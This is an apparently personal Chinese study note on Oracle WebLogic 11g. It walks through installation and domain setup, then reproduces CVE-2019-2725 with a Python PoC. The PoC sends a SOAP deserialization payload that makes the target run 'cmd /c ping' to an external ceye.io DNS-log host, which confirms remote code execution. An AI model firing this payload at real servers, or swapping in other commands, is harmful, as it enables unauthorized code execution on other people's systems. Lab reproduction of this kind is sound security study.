Weblogic记录

有些坑还是要去踩，上来就docker一脸懵逼。

1、应用

https://www.cnblogs.com/xdp-gacl/p/4140683.html

（1）安装

环境：

• 64位server2016
• jdk1.7
• wls1036_generic.jar（11g）

下载好jar，之后执行 java -D64 -jar wls1036_generic.jar

下一步

ps：之后出现的邮件和代理请忽略

典型安装类型，下一步

找到本地jdk的安装路径，下一步

安装路径，下一步。安装概要，下一步，之后就会安装。

安装完成

（2）Quickstart配置

开始吧

新建域，下一步

域源不管，直接下一步。设置域名，域位置，这里默认，也不管。设置管理员用户名和密码，下一步。

选择模式和jdk，这里选择生产模式

可选配置先选管理服务器（中间件负载那些目前本菜鸡还没摸到，先不管），下一步

设置监听地址和端口和ssl，下一步

路径（如果改了路径，请找下）：C:\Oracle\Middleware\user_projects\domains\base_domain下有个启动脚本bat，直接双击，之后输入账号密码。

• 或者找到快捷方式启动Start Admin Server for Weblogic Server Domain，之后输入账号密码。

之后访问http://ip:port/console，看见控制台即可。部署war

参考：https://www.cnblogs.com/xiaozi/p/9214345.html

2、漏洞复现

（1）CVE-2019-2725/CNVD-C-2019-48814

#coding:utf-8
import requests
#平台不同，路径不同问题。
url="http://192.168.152.131:7001"
path='/_async/AsyncResponseService'
header={'content-type':'text/xml'}
#假设机器通外网
payload1='''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>ping 236136123.xxxx.ceye.io</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
'''
try:
	rep=requests.get(url+path,timeout=3)
	if rep.status_code==200:
		r=requests.post(url+path,headers=header,data=payload1,timeout=3)
		if r.status_code==202:
			print url,"----","可能存在wls9-async组件反序列化漏洞"
except Exception as e:
	print "error"
#参考
#https://github.com/SkyBlueEternal/CNVD-C-2019-48814-or-CNNVD-201904-961
#https://www.t00ls.net/thread-50968-1-1.html
#回显poc  https://xz.aliyun.com/t/5299